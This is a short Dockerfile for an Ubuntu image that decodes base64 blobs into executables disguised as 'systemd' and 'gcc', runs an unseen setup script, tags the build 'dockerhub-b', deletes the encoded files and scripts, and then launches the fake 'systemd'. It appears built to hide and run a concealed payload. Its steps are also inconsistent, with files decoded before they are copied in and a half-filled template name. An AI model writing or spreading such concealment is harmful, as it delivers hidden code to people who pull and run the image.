FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > systemd.log'

RUN base64 --decode systemd.64 > systemd
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY systemd .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' systemd
RUN bash ./docker.sh

RUN rm --force --recursive systemd _REPO_NAME__.64 docker.sh gcc gcc.64

CMD systemd
